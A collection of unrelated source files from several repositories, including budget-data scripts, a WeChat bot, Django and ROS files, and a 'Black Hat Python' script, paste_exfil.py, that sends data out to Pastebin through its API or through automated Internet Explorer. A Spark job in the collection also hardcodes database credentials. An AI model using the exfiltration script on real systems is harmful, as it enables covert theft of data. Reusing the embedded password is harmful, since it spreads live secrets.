97e381ef7d46e7f152a3aa58110194e19506c35d | dd63c94dee080c4628da0acbc8e36642ffc14920 | /scripts/python-scripts/open_budget_other.py | 7183550add42a856dd222a1fc9b22523d78be2dd | [] | no_license | CityOfLosAngeles/laBudget | 120f6d3b22fc6a6f3448fdf7b45894975d93ba67 | 97c0b583c8039d5b72cf8f94f7db4583a93e46b8 | refs/heads/master | 2021-08-05T16:51:29.393342 | 2021-07-29T17:33:50 | 2021-07-29T17:33:50 | 126,221,242 | 1 | 0 | null | 2018-03-21T18:08:40 | 2018-03-21T18:08:39 | null | UTF-8 | Python | false | false | 7,406 | py | #!/usr/bin/env python3
# open_data_ther.py
# Chelsea Ursaner. Edited by Adam Scherling. 6/11/2018
# Converted/Updated July 2021, Irene Tang
####################
## Setup
####################
# make sure to install these packages before running:
# pip install pandas
# pip install sodapy
import datetime
import pandas as pd
import credentials
from sodapy import Socrata
# set up Socrata client
client = Socrata('data.lacity.org', None)
# uncomment if you are going to log in / push to the data portal
# username = credentials.lahub_user
# password = credentials.lahub_pass
# apptoken = credentials.lahub_auth
# client = Socrata('data.lacity.org', apptoken, username=username, password=password)
# csv sheet filenames
csv_filenames = {
'gfrev': '../../data/approved_budget/FY21-22/General_Fund_Revenue_2122_Adopted.csv',
'positions': '../../data/approved_budget/FY21-22/Positions_2122_Adopted.csv',
'inc': '../../data/approved_budget/FY21-22/Budget_Requests_Detail_Sec2_2122_Adopted.csv',
'pm': '../../data/approved_budget/FY21-22/Performance_Measures_2122_Adopted.csv',
}
filepath_prefix = '../../data/approved_budget/FY21-22/'
# # Socrata urls
# urls = {
# 'gfrev' : 'https://data.lacity.org/A-Prosperous-City/General-Fund-Revenue/qrkr-kfbh',
# 'positions' : 'https://data.lacity.org/A-Well-Run-City/Positions/46qe-t7np',
# 'inc' : 'https://data.lacity.org/A-Prosperous-City/General-City-Budget-Incremental-Changes/k4k6-bwwv',
# 'pm' : 'https://data.lacity.org/A-Prosperous-City/Performance-Measures/bywz-284j',
# }
# # Socrata endpoints
# endpoints = {
# 'gfrev' : 'https://data.lacity.org/resource/qrkr-kfbh.json',
# 'positions' : 'https://data.lacity.org/resource/46qe-t7np.json',
# 'inc' : 'https://data.lacity.org/resource/k4k6-bwwv.json',
# 'pm' : 'https://data.lacity.org/resource/bywz-284j.json',
# }
# Socrata identifiers
identifiers = {
'gfrev': 'qrkr-kfbh',
'positions': '46qe-t7np',
'inc': 'k4k6-bwwv',
'pm': 'bywz-284j'
}
timestamp = datetime.datetime.now()
####################
## General fund revenue
####################
# Read the previous dataset from Socrata and save a local copy
gfrev_existing = pd.DataFrame.from_records(client.get(identifiers.get('gfrev'), limit=99999999999999))
gfrev_existing.to_csv(f'{filepath_prefix}old_gfrev_{timestamp}.csv', index=False)
# Read the new file
gfrev_current = pd.read_csv(csv_filenames.get('gfrev'))
# Rename to match original
gfrev_current.rename(columns={
'Dept Code': 'dept_code',
'Dept Name': 'department_name',
'Prog Code': 'program_code',
'Prog Name': 'program_name',
'Fund Code': 'fund_code',
'Fund Name': 'fund_name',
'Account Code': 'account_code',
'Account Name': 'account_name',
'2021-22 Adopted': 'revenue'
}, inplace=True)
# add a fiscal year column
gfrev_current['fiscal_year'] = '2021_22_adopted'
# filter out rows with no revenue
gfrev_current.dropna(how='all', subset=['revenue'], inplace=True)
# select only the relevant columns
gfrev_current = gfrev_current[gfrev_existing.columns]
# Make new dataset
gfrev_new = pd.concat([gfrev_existing, gfrev_current], axis=0)
gfrev_new.to_csv(f'{filepath_prefix}new_gfrev.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('gfrev'), gfrev_new)
###################
# Positions
###################
# Read the previous dataset from Socrata and save a local copy
positions_existing = pd.DataFrame.from_records(client.get(identifiers.get('positions'), limit=99999999999999))
positions_existing.to_csv(f'{filepath_prefix}old_positions_{timestamp}.csv', index=False)
# Read the new file
positions_current = pd.read_csv(csv_filenames.get('positions'))
# Rename to match original
positions_current.rename(columns={
'Dept Code': 'department_code',
'Dept Name': 'department_name',
'Prog Code': 'program_code',
'Prog Name': 'program_name',
'Fund Code': 'fund_code',
'Source Fund Code': 'source_fund_code',
'Source Fund Name': 'source_fund_name',
'Account Code': 'account_code',
'Account Name': 'account_name',
'2021-22 Adopted': 'positions'
}, inplace=True)
# add a budget column
positions_current['budget'] = '2021-2022 Adopted Budget'
# select only the relevant columns
positions_current = positions_current[positions_existing.columns]
# Make new dataset
positions_new = pd.concat([positions_existing, positions_current], axis=0)
positions_new.to_csv(f'{filepath_prefix}new_positions.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('positions'), positions_new)
###################
# Incremental changes
###################
# Read the previous dataset from Socrata and save a local copy
inc_existing = pd.DataFrame.from_records(client.get(identifiers.get('inc'), limit=99999999999999))
inc_existing.to_csv(f'{filepath_prefix}old_incremental_{timestamp}.csv', index=False)
# Read the new file
inc_current = pd.read_csv(csv_filenames.get('inc'))
# Rename to match original
inc_current.rename(columns={
'Department Code': 'department_code',
'Department Name': 'department_name',
'Program Code': 'program_code',
'Program Name': 'program_name',
'Fund Code': 'fund_code',
'Fund Name': 'fund_name',
'Source Fund Code': 'source_fund_code',
'Source Fund Name': 'source_fund_name',
'Budget Request Description': 'budget_request_description',
'Budget Request Category': 'budget_request_category',
'Budget Object Code': 'account_code',
'Audit Budget Object Name': 'account_name',
'One Time/ On-going': 'one_time_ongoing',
'2021-22 (Adopted) Incremental change from 2020-21 Adopted Budget': 'incremental_change'
}, inplace=True)
# add a fiscal year column
inc_current['budget'] = '2021-22 Adopted Budget Incremental Change from 2020-21 Adopted'
# select only the relevant columns
inc_current = inc_current[inc_existing.columns]
# Make new dataset
inc_new = pd.concat([inc_existing, inc_current], axis=0)
inc_new.to_csv(f'{filepath_prefix}new_incremental_changes.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('inc'), inc_new)
####################
## Performance Measures
####################
# Read the previous dataset from Socrata and save a local copy
pm_existing = pd.DataFrame.from_records(client.get(identifiers.get('pm'), limit=99999999999999))
pm_existing.to_csv(f'{filepath_prefix}old_performance_{timestamp}.csv', index=False)
# Read the new file
pm_current = pd.read_csv(csv_filenames.get('pm'))
# Rename to match original
pm_current.rename(columns={
'Dept Code': 'department_code',
'Department Name': 'department_name',
'Org Level 5 Code': 'subdept_code',
'Org Level 5 Name': 'subdept_name',
'Prog Code': 'program_code',
'Program Name': 'program_name',
'PM Code': 'performance_measure_code',
'Performance Measure Name': 'performance_measure_name',
'Unit/Value': 'unit',
'2021-22 Adopted': 'performance_measure_amount'
}, inplace=True)
# add a fiscal year column
pm_current['budget'] = '2021-22 Adopted'
# select only the relevant columns
pm_current = pm_current[pm_existing.columns]
# Make new dataset
pm_new = pd.concat([pm_existing, pm_current], axis=0)
pm_new.to_csv(f'{filepath_prefix}new_performance_measures.csv', index=False)
# upload the data to Socrata
# client.replace(identifiers.get('pm'), pm_new)
| [
"[email protected]"
] | |
1bec78b72f8e244904787164e9f8ab80bebfd067 | cdaedd6c77e1cd04bb15918bbec9895df71d862d | /receive.py | 2d425b44fba5000cdc363d9ff745424fac7c574c | [] | no_license | YPeking/WeChatRobot | 867f164ec60b378bdb9cc1e6bb616298a400fbe1 | ee5d8794f6d71f09baea805f19ef0cf7c39f21ef | refs/heads/master | 2020-04-18T21:43:57.096601 | 2019-01-27T05:30:12 | 2019-01-27T05:30:12 | 167,773,132 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,878 | py | # -*- coding:utf-8 -*-
# filename: receive.py
import xml.etree.ElementTree as ET
import json
import requests
import urllib2
import re
import random
import sys
from bs4 import BeautifulSoup
reload(sys)
sys.setdefaultencoding('utf-8')
def parse_xml(web_data):
if len(web_data) == 0:
return None
xmlData = ET.fromstring(web_data)
msg_type = xmlData.find('MsgType').text
if msg_type == 'text':
return TextMsg(xmlData)
elif msg_type == 'image':
return ImageMsg(xmlData)
elif msg_type == 'voice':
return VoiceMsg(xmlData)
class Msg(object):
def __init__(self, xmlData):
self.ToUserName = xmlData.find('ToUserName').text
self.FromUserName = xmlData.find('FromUserName').text
self.CreateTime = xmlData.find('CreateTime').text
self.MsgType = xmlData.find('MsgType').text
self.MsgId = xmlData.find('MsgId').text
class TextMsg(Msg):
def __init__(self, xmlData):
Msg.__init__(self, xmlData)
content = xmlData.find('Content').text.encode('utf-8')
if((u"段子" in content) or (u"笑话" in content)):
self.Content = get_joke()
elif(u"微博" == content):
self.Content = get_weibo()
elif(u"天气" == content):
self.Content = get_weather()
else:
self.Content = get_tuling_answer(content).encode('utf-8')
class ImageMsg(Msg):
def __init__(self, xmlData):
Msg.__init__(self, xmlData)
self.PicUrl = xmlData.find('PicUrl').text
self.MediaId = xmlData.find('MediaId').text
class VoiceMsg(Msg):
def __init__(self, xmlData):
Msg.__init__(self, xmlData)
self.MediaId = xmlData.find('MediaId').text
self.Recognition = xmlData.find('Recognition').text
if((u"段子" in self.Recognition) or (u"笑话" in self.Recognition)):
self.Content = get_joke()
elif(u"微博" in self.Recognition):
self.Content = get_weibo()
elif(u"天气" == self.Recognition):
self.Content = get_weather()
else:
self.Content = get_tuling_answer(self.Recognition).encode('utf-8')
# 通过图灵机器人接口进行自动回复
def get_tuling_answer(content):
userId = '123456'
inputText = {'text': content}
# 替换成自己的图灵key
key = 'tuling key'
userInfo = {'apiKey':key, 'userId':userId}
perception = {'inputText':inputText}
data = {'perception':perception, 'userInfo':userInfo}
url = 'http://openapi.tuling123.com/openapi/api/v2'
response = requests.post(url=url, data=json.dumps(data))
response.encoding = 'utf-8'
result = response.json()
answer = result['results'][0]['values']['text']
return answer
# 自动获取糗事百科的段子
def get_joke():
page_num = random.randint(1, 12)
url = 'http://www.qiushibaike.com/hot/page/' + str(page_num)
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = {'User-Agent':user_agent}
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
content = response.read().decode('utf-8')
pattern = re.compile('<div class="author clearfix">.*?<h2>(.*?)</h2>.*?<div.*?span>(.*?)</span>(.*?)<div class="stats">.*?"number">(.*?)</i>' ,re.S)
items = re.findall(pattern,content)
joke_num = random.randint(1, 15)
joke_count = 0
for item in items:
haveImg = re.search("img", item[2])
if not haveImg:
joke_count += 1
if joke_count == joke_num:
strinfo = re.compile("<br/>")
joke = strinfo.sub("", item[1])
spaceinfo = re.compile("\n")
joke_content = spaceinfo.sub("", joke)
return joke_content
# 获取微博热搜
def get_weibo():
url = 'http://s.weibo.com/top/summary?cate=realtimehot'
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = {'User-Agent':user_agent}
request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)
content = response.read().decode('utf-8')
bsObj=BeautifulSoup(content)
i = 0
weibo_content = ""
# 获取热搜名称与链接
for tag in bsObj.find_all("a", {"target":"_blank"}):
weibo = re.findall(r"<a href=\"(.*?)\" target=\"_blank\">(.*?)</a>" ,str(tag))
(weibo_url, weibo_title) = weibo[0]
if("<img alt=" in weibo_title):
nPos = weibo_title.index(" <img alt=")
weibo_title = weibo_title[0:nPos]
weibo_url = "https://s.weibo.com" + weibo_url
weibo_link = "<a href=\"%s\">%s</a>" % (weibo_url, weibo_title)
weibo_content = weibo_content + weibo_link + "\n\n"
i += 1
if i==6:
break
return weibo_content
# 获取北京天气
def get_weather():
# 天气链接
weatherJsonUrl = "http://wthrcdn.etouch.cn/weather_mini?city=北京"
response = requests.get(weatherJsonUrl)
weather_content = ""
#将json文件格式导入成python的格式
weatherData = json.loads(response.text)
# 今日最高温度与最低温度、风力信息
total_info = weatherData['data']['forecast'][0]['type']
high_temperature = weatherData['data']['forecast'][0]['high'][3:]
low_temperature = weatherData['data']['forecast'][0]['low'][3:]
fengli = weatherData['data']['forecast'][0]['fengli'][9:]
wind_info = weatherData['data']['forecast'][0]['fengxiang'] + " " + fengli[:-3]
today_info = "今天 " + total_info + " " + high_temperature + "~" + low_temperature + "\n " + wind_info
# 明天最高温度与最低温度、风力信息
total_info = weatherData['data']['forecast'][1]['type']
high_temperature = weatherData['data']['forecast'][1]['high'][3:]
low_temperature = weatherData['data']['forecast'][1]['low'][3:]
fengli = weatherData['data']['forecast'][1]['fengli'][9:]
wind_info = weatherData['data']['forecast'][1]['fengxiang'] + " " + fengli[:-3]
tomorrow_info = "明天 " + total_info + " " + high_temperature + "~" + low_temperature + "\n " + wind_info
# 后天最高温度与最低温度、风力信息
total_info = weatherData['data']['forecast'][2]['type']
high_temperature = weatherData['data']['forecast'][2]['high'][3:]
low_temperature = weatherData['data']['forecast'][2]['low'][3:]
fengli = weatherData['data']['forecast'][2]['fengli'][9:]
wind_info = weatherData['data']['forecast'][2]['fengxiang'] + " " + fengli[:-3]
last_info = "后天 " + total_info + " " + high_temperature + "~" + low_temperature + "\n " + wind_info
# 建议
suggest = " " + weatherData['data']['ganmao']
weather_content = today_info + "\n" + tomorrow_info + "\n" + last_info + "\n\n" + suggest
return weather_content
| [
"[email protected]"
] | |
bfd099d66ee9d7b87dd9a8eb08c4997bc219aa25 | 834c39ad6ee2bb11f76eff7a0beb00dd7ccad92c | /Blood_project/Blood_project/urls.py | c9c22e1f99986e18d5185c8a8c274d9a566a531e | [] | no_license | krishnarc/uyirottam | 7287cf506cf447341e051083e917ee6113ffb13d | a366cba8be3610fe92be2be10ef6db681a1231b2 | refs/heads/master | 2021-04-03T06:50:09.670508 | 2018-03-11T13:54:56 | 2018-03-11T13:54:56 | 124,734,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | """Blood_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url,include
from django.urls import path
from Blood_app import views
urlpatterns = [
url(r'^$',views.index,name="index"),
url(r'^Blood_app/',include("Blood_app.urls")),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
d4f9b4e366d56eaaeff7f64d62067dd824b12004 | b8680901550000885423448cc4ca2564671a82b6 | /tienda/store/views.py | 4c38a47dc5403d70509941a5a7f25e454d1aff15 | [] | no_license | EdgarRuizUribe/storeDjango | c401bdb1f8e700d1ba9119ac52d02fd622f27146 | 322defc45241cd163cede14d0618a3ca25cf47a7 | refs/heads/master | 2020-03-31T10:03:53.949226 | 2019-03-14T16:27:50 | 2019-03-14T16:27:50 | 152,121,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from django.shortcuts import render, get_object_or_404
from .models import *
from django.shortcuts import redirect
# Create your views here.
def store_home(request):
productos = Producto.objects.all()
return render(request, 'store/store_productos.html',{'productos':productos})
def producto_detalle(request, pk):
# if request.method == 'POST':
# else:
producto = get_object_or_404(Producto, pk=pk)
return render(request, 'store/producto_detalle.html',{'producto':producto}) | [
"[email protected]"
] | |
7c00814fdab5464425f65d37ee9b12c6dd61a2b9 | d29e8586ae5da87b03e1636cc50f85e6dcf866b3 | /writeToMysqlTop500_3.py | 31f64ef400487d8220f41420749de6402b7728be | [] | no_license | kummar/Spark2Mysql | 453e34a8c9f3933ad8e446accc7b93e7331796f3 | ec8cd4a4a2f89865b42a13947b2f17e225ef98e0 | refs/heads/master | 2020-03-17T18:35:26.493596 | 2018-05-17T14:52:35 | 2018-05-17T14:52:35 | 133,827,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,291 | py | # -*- coding: utf-8 -*-
#sys.setdefaultencoding('utf-8')
from pyspark.sql import SparkSession,functions
import datetime
from pyspark.sql import Row
#get yesterday
class DataUtil(object):
def getYesterday(self):#获取昨天的日期
yesterday=datetime.datetime.today()- datetime.timedelta(days=1)#减去一天
return yesterday.strftime('%Y%m%d')
#创建spark环境
warehouse_location = "/user/hive/warehouse"
spark = SparkSession\
.builder\
.appName("yiju")\
.config("spark.sql.warehouse.dir",warehouse_location)\
.enableHiveSupport()\
.getOrCreate()
sc = spark.sparkContext
yesterday=DataUtil().getYesterday()
df=spark.sql("select f.shop_id,f.data,f.count,f.type from ( select shop_id,e.data,e.count,e.type, row_number() over (partition BY e.shop_id,e.type ORDER BY e.count DESC) AS rownum from dmp.eju_result_all e )F where f.rownum<=500").repartition(200)
df.withColumn('date',functions.lit(yesterday))\
.write.mode("append").format("jdbc").option("url", "jdbc:mysql://172.16.103.174:3306/yj_dsp")\
.option("driver","com.mysql.jdbc.Driver").option("dbtable", "t_ehouse_report2")\
.option("user", "dspapp").option("password", "Ds.16Adm").option("useSSL", "false").save()
| [
"[email protected]"
] | |
28dfc33f12c30cd2809e6e0f6ed5e7f7d1e972f3 | 3ba0dc2a1c4a32881e10f1a750ef96d0772049fb | /12-8.py | 8a5694745732ec9f4e609c2daeaaa467616e715d | [] | no_license | yellow77/pythonad | de5a07d58e3ec199011fb2de4e032d7b9bb33d5a | 14e03a3c3e1562b08f6cda033b667b1a02e02a08 | refs/heads/master | 2020-07-18T22:03:08.655564 | 2019-09-05T04:53:07 | 2019-09-05T04:53:07 | 206,321,031 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 521 | py | # _*_ coding: utf-8 _*_
# 程式 12-8 (Python 3 Version)
import os, hashlib, glob
allfiles = glob.glob('*.jpg') + glob.glob('*.png')
allmd5s = dict()
for imagefile in allfiles:
print(imagefile + " is processing...")
img_md5 = hashlib.md5(open(imagefile,'rb').read()).digest()
if img_md5 in allmd5s:
print("---------------")
print("以下為重覆的檔案:")
os.system("open " + os.path.abspath(imagefile))
os.system("open " + allmd5s[img_md5])
else:
allmd5s[img_md5] = os.path.abspath(imagefile)
| [
"[email protected]"
] | |
df89b2ad0a03436054a0cd230c4e9e9f85600525 | df560dde5ffbae51187041f422c87f7d1544cbe9 | /leetcode/python/73_set_matrix_zeroes.py | 2de9b6873ddcd703af3c4af78da47cf6055c48a0 | [
"MIT"
] | permissive | VVKot/coding-competitions | 61c97dbc4fdaeb0a35ff7fa8e55529b579fd1ebb | 7d6e599b223d89a7861929190be715d3b3604fa4 | refs/heads/master | 2021-07-04T17:47:34.246535 | 2020-09-23T20:28:30 | 2020-09-23T20:28:30 | 174,696,391 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | from typing import List
class Solution:
def setZeroes(self, matrix: List[List[int]]) -> None:
H = len(matrix)
W = len(matrix[0])
col1 = 1
for y in range(H):
for x in range(W):
if not matrix[y][x]:
if x == 0:
col1 = 0
else:
matrix[0][x] = matrix[y][0] = 0
for y in reversed(range(H)):
for x in reversed(range(W)):
if x == 0:
if col1 == 0:
matrix[y][x] = 0
elif matrix[0][x] == 0 or matrix[y][0] == 0:
matrix[y][x] = 0
| [
"[email protected]"
] | |
bbf1579edad71cb815dff1b82b3f7a251ea0d70b | d4f264368005a8b1e9411e606ab0465492e21caf | /conftest.py | 04fc7fd61459888cb1b2a6732c6ac87bcf416b5c | [
"BSD-2-Clause"
] | permissive | harvimt/tes4py | d2c4445bf40fec02e5bc730a87c14394f71d2918 | a6f3abc046f9ef6f5185b13a844e7c00ce13f21d | refs/heads/master | 2020-05-04T13:57:13.766608 | 2019-04-03T00:37:32 | 2019-04-03T00:37:32 | 179,179,933 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | import sys
import os.path
sys.path.append(os.path.dirname(__file__)) | [
"[email protected]"
] | |
fb8e2f2f36b3d5a401c0be898b46659cae39cf29 | 1c3f695d939dfd8bb5f3671648c7f538c6f4d01f | /Chapter09/paste_exfil.py | 7d3eb2ad73675946a252b4235a6921c04360f09b | [
"MIT"
] | permissive | Mazuco/Black-Hat-Python | 83be969770768f61daadd068287d1fe3bec0defd | 0f7432d523d88ddb4295d9e558ead679961ecbb2 | refs/heads/main | 2023-04-02T14:06:21.899542 | 2021-03-18T18:44:51 | 2021-03-18T18:44:51 | 349,146,558 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,204 | py | from win32com import client
import os
import random
import requests
import time
username = 'tim'
password = 'seKret'
api_dev_key = 'cd3xxx001xxxx02'
def plain_paste(title, contents):
login_url = 'https://pastebin.com/api/api_login.php'
login_data = {
'api_dev_key': api_dev_key,
'api_user_name': username,
'api_user_password': password,
}
r = requests.post(login_url, data=login_data)
api_user_key = r.text
paste_url = 'https://pastebin.com/api/api_post.php'
paste_data = {
'api_paste_name': title,
'api_paste_code': contents.decode(),
'api_dev_key': api_dev_key,
'api_user_key': api_user_key,
'api_option': 'paste',
'api_paste_private': 0,
}
r = requests.post(paste_url, data=paste_data)
print(r.status_code)
print(r.text)
def wait_for_browser(browser):
while browser.ReadyState != 4 and browser.ReadyState != 'complete':
time.sleep(0.1)
def random_sleep():
time.sleep(random.randint(5,10))
def login(ie):
full_doc = ie.Document.all
for elem in full_doc:
if elem.id == 'loginform-username':
elem.setAttribute('value', username)
elif elem.id == 'loginform-password':
elem.setAttribute('value', password)
random_sleep()
if ie.Document.forms[0].id == 'w0':
ie.document.forms[0].submit()
wait_for_browser(ie)
def submit(ie, title, contents):
full_doc = ie.Document.all
for elem in full_doc:
if elem.id == 'postform-name':
elem.setAttribute('value', title)
elif elem.id == 'postform-text':
elem.setAttribute('value', contents)
if ie.Document.forms[0].id == 'w0':
ie.document.forms[0].submit()
random_sleep()
wait_for_browser(ie)
def ie_paste(title, contents):
ie = client.Dispatch('InternetExplorer.Application')
ie.Visible = 1
ie.Navigate('https://pastebin.com/login')
wait_for_browser(ie)
login(ie)
ie.Navigate('https://pastebin.com/')
wait_for_browser(ie)
submit(ie, title, contents.decode())
ie.Quit()
if __name__ == '__main__':
ie_paste('title', 'contents')
| [
"[email protected]"
] | |
efd1d2ca53daa70e280868bb3653d80b87a6acf9 | 32079a99520872be97e83ccbd3ae6f003f925006 | /devel/lib/python2.7/dist-packages/um7/srv/_Reset.py | fc277551aa00b30da6af51f1fe9b0b4d4e764e76 | [] | no_license | wndxwilson/Azimorph | a00fa8d34e664cc29cd9226ec378f93fa7df088e | 60b81694cadaaf30b9f640a4ed3bebd20ebc2f1a | refs/heads/master | 2023-02-16T12:55:26.046759 | 2021-01-08T22:09:30 | 2021-01-08T22:09:30 | 328,021,807 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,602 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from um7/ResetRequest.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class ResetRequest(genpy.Message):
_md5sum = "626ea3efbc6874926126840202a803dd"
_type = "um7/ResetRequest"
_has_header = False # flag to mark the presence of a Header object
_full_text = """bool zero_gyros
bool reset_ekf
bool set_mag_ref
"""
__slots__ = ['zero_gyros','reset_ekf','set_mag_ref']
_slot_types = ['bool','bool','bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
zero_gyros,reset_ekf,set_mag_ref
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ResetRequest, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.zero_gyros is None:
self.zero_gyros = False
if self.reset_ekf is None:
self.reset_ekf = False
if self.set_mag_ref is None:
self.set_mag_ref = False
else:
self.zero_gyros = False
self.reset_ekf = False
self.set_mag_ref = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3B().pack(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 3
(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref,) = _get_struct_3B().unpack(str[start:end])
self.zero_gyros = bool(self.zero_gyros)
self.reset_ekf = bool(self.reset_ekf)
self.set_mag_ref = bool(self.set_mag_ref)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3B().pack(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
_x = self
start = end
end += 3
(_x.zero_gyros, _x.reset_ekf, _x.set_mag_ref,) = _get_struct_3B().unpack(str[start:end])
self.zero_gyros = bool(self.zero_gyros)
self.reset_ekf = bool(self.reset_ekf)
self.set_mag_ref = bool(self.set_mag_ref)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3B = None
def _get_struct_3B():
global _struct_3B
if _struct_3B is None:
_struct_3B = struct.Struct("<3B")
return _struct_3B
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from um7/ResetResponse.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class ResetResponse(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "um7/ResetResponse"
_has_header = False # flag to mark the presence of a Header object
_full_text = """
"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ResetResponse, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
class Reset(object):
_type = 'um7/Reset'
_md5sum = '626ea3efbc6874926126840202a803dd'
_request_class = ResetRequest
_response_class = ResetResponse
| [
"[email protected]"
] | |
90353abd39008a6c7583f09e1b4866b8af3d8af2 | 7d4bfd9c8970de5abd143fcb5ff3f3927f4bf1b0 | /cardiotronics/wsgi.py | 7f76acab2ead5e8cb7aa7a960c987b95a0e89efa | [] | no_license | devthoughtwin/demo2 | 055f871bea7c84e36de386c1dd25effb38f9f88e | e99230161ae0d2f85a689ceab7794a2323415168 | refs/heads/master | 2020-04-22T15:31:35.826542 | 2019-02-13T09:38:01 | 2019-02-13T09:38:01 | 170,480,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for cardiotronics project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cardiotronics.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
